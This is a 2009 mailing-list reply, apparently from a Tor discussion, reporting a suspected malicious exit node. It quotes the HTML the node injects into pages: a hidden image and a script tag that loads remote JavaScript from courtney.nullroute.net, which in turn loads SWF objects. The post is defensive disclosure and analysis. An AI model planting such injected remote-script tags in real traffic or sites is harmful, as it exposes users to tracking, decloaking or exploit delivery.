On Tue, 2 Jun 2009 05:36:43 -0600 John Brooks <spec...@dereferenced.net> wrote:
> Definitely abusive. Fortunately, because of how nearby most of the IPs > are, Tor will treat them as family even if the operator neglected to, > so it doesn't pose a risk to anonymity (other than the one outlying > node, but even then it's a maximum of two), but this definitely looks > like a badexit situation. > > Honestly, why does somebody run a tor node if they keep > connection/session logs? Seems like an odd place to look for a > paycheck. > > - John Brooks > Might be worse then that.. at least for improperly configures clients.. there deos seem to be javascript injection: <div id="floaterma9"> <img src="http://courtney.nullroute.net/2lol.gif" style="display:none"></img> <script type='text/javascript' src='http://courtney.nullroute.net/openx-2.8.1/www/delivery/spcjs.php?id=1'></script> <style> body { margin: 0 0 0 0 !important; } #Banner2 { width:728px; height:90px; } #textme { font-family:arial; color:#333; font-size:11px; } </style> When I Followed http://courtney.nullroute.net/openx-2.8.1/www/delivery/spcjs.php?id=1 it had an interesting bit bit of code which linked to: http://courtney.nullroute.net/openx-2.8.1/www/delivery/fl.js Which tries to load up SWF objects.. Haven't picked it all apart yet (still no coffee) but I'm guessing it's either decloaking attempts or exploit attempts. -- free...@gmail.com free...@yahoo.ca This e-mail has been digitally signed with GnuPG - ( http://gnupg.org/ )
signature.asc
Description: PGP signature